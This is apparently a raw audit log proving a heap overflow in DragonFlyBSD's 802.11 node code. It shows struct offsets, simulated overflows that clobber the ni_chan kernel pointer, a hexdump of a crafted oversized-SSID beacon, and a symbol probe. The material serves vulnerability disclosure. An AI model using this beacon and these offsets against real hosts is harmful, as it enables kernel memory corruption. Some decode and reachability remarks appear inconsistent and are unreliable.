DragonFlyBSD Kernel Audit
DF-0326 / run.log
← back to finding ↓ download raw
===== node_overflow (code-level proof) =====
DF-0326: ieee80211_node SSID heap overflow -- code-level proof
struct node_tail size = 136 bytes (LP64)
Offsets (from start of node_tail):
  ni_esslen              off=28   size=1 
  ni_essid[32]           off=29   size=32
  ni_rates               off=61   size=16
  ni_chan (POINTER)      off=80   size=8   (kernel POINTER)
  ni_fhdwell             off=88   size=2 
  ni_fhindex             off=90   size=1 
  ni_erp                 off=92   size=2 
  ni_timoff              off=94   size=2 
  ni_dtim_period         off=96   size=1 
  ni_dtim_count          off=97   size=1 
  ni_meshidlen           off=98   size=1 
  ni_meshid[32]          off=99   size=32

ni_essid -> ni_chan distance = 51 bytes
=> an SSID of length >= 59 fully overwrites ni_chan.

=== overflow with ssid_len = 32 (ni_esslen now 32) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 32 bytes -> 0 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] fits
  ni_rates               off=61   size=16  intact   
  ni_chan (POINTER)      off=80   size=8   intact     ptr=0xdeadbeef12345678
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   

=== overflow with ssid_len = 48 (ni_esslen now 48) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 48 bytes -> 16 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   intact     ptr=0xdeadbeef12345678
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   
  ni_chan at offset 80 is BEYOND this ssid_len (77) -> not reached

=== overflow with ssid_len = 56 (ni_esslen now 56) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 56 bytes -> 24 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xdeadbecccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   intact   
  ni_fhindex             off=90   size=1   intact   
  ni_erp                 off=92   size=2   intact   
  ni_timoff              off=94   size=2   intact   
  ni_dtim_period         off=96   size=1   intact   
  ni_dtim_count          off=97   size=1   intact   
  ni_meshidlen           off=98   size=1   intact   
  ni_meshid[32]          off=99   size=32  intact   
  ni_chan bytes after overflow (offset 80): ccccccccccbeadde   <- 5/8 bytes of the channel pointer are attacker-controlled

=== overflow with ssid_len = 192 (ni_esslen now 192) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 192 bytes -> 160 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   CLOBBERED
  ni_fhindex             off=90   size=1   CLOBBERED
  ni_erp                 off=92   size=2   CLOBBERED
  ni_timoff              off=94   size=2   CLOBBERED
  ni_dtim_period         off=96   size=1   CLOBBERED
  ni_dtim_count          off=97   size=1   CLOBBERED
  ni_meshidlen           off=98   size=1   CLOBBERED
  ni_meshid[32]          off=99   size=32  CLOBBERED
  ni_chan bytes after overflow (offset 80): cccccccccccccccc   <- 8/8 bytes of the channel pointer are attacker-controlled

=== overflow with ssid_len = 255 (ni_esslen now 255) ===
  ni_essid sink is 32 bytes wide; memcpy wrote 255 bytes -> 223 byte OVERFLOW
  ni_esslen              off=28   size=1   intact   
  ni_essid[32]           off=29   size=32  [SINK] overflows past end
  ni_rates               off=61   size=16  CLOBBERED
  ni_chan (POINTER)      off=80   size=8   CLOBBERED  ptr=0xcccccccccccccccc  <-- ATTACKER-CONTROLLED KERNEL POINTER
  ni_fhdwell             off=88   size=2   CLOBBERED
  ni_fhindex             off=90   size=1   CLOBBERED
  ni_erp                 off=92   size=2   CLOBBERED
  ni_timoff              off=94   size=2   CLOBBERED
  ni_dtim_period         off=96   size=1   CLOBBERED
  ni_dtim_count          off=97   size=1   CLOBBERED
  ni_meshidlen           off=98   size=1   CLOBBERED
  ni_meshid[32]          off=99   size=32  CLOBBERED
  ni_chan bytes after overflow (offset 80): cccccccccccccccc   <- 8/8 bytes of the channel pointer are attacker-controlled

VERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE
length byte exceeds 32. ni_rates (offset 32) and the ni_chan kernel
POINTER (offset 51 from ni_essid) are both attacker-writable.

===== beacon_gen 192 > beacon.bin =====
DF-0326 beacon emitted: ssid_len=192 (>32 triggers the ni_essid[32] overflow;
  ni_rates + ni_chan pointer are clobbered). Total 192 SSID bytes attack-controlled.
first 96 bytes of the crafted beacon (hexdump -C):
00000000  08 00 00 00 ff ff ff ff  ff ff 00 11 22 33 44 55  |............"3DU|
00000010  00 11 22 33 44 55 00 00  00 00 00 00 00 00 00 00  |.."3DU..........|
00000020  64 00 01 04 00 c0 41 42  43 44 45 46 47 48 49 4a  |d.....ABCDEFGHIJ|
00000030  4b 4c 4d 4e 4f 50 51 52  53 54 55 56 57 58 59 5a  |KLMNOPQRSTUVWXYZ|
00000040  41 42 43 44 45 46 47 48  49 4a 4b 4c 4d 4e 4f 50  |ABCDEFGHIJKLMNOP|
00000050  51 52 53 54 55 56 57 58  59 5a 41 42 43 44 45 46  |QRSTUVWXYZABCDEF|
beacon.bin size:
-rw-r--r--  1 maxx  maxx  239 Jul  1 16:09 beacon.bin
--- decode: byte at offset 0x26 (38) is fc0 subtype, SSID IE tag+len at body offset 0x18..0x19 ---

===== live-kernel reachability probe =====
--- vulnerable symbols in /boot/kernel/kernel (T = live text) ---
ffffffff8078c4c0 T ieee80211_add_scan
ffffffff8077dc50 T ieee80211_init_neighbor
ffffffff8077d1f0 T ieee80211_sta_join
ffffffff8077c570 t ieee80211_sta_join1
--- SSID_INVALID status flag consumers (should be NONE) ---
grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis
--- 802.11 interfaces present (radio check) ---
vtnet0 lo0
RUN_OK
RUN_EXIT=0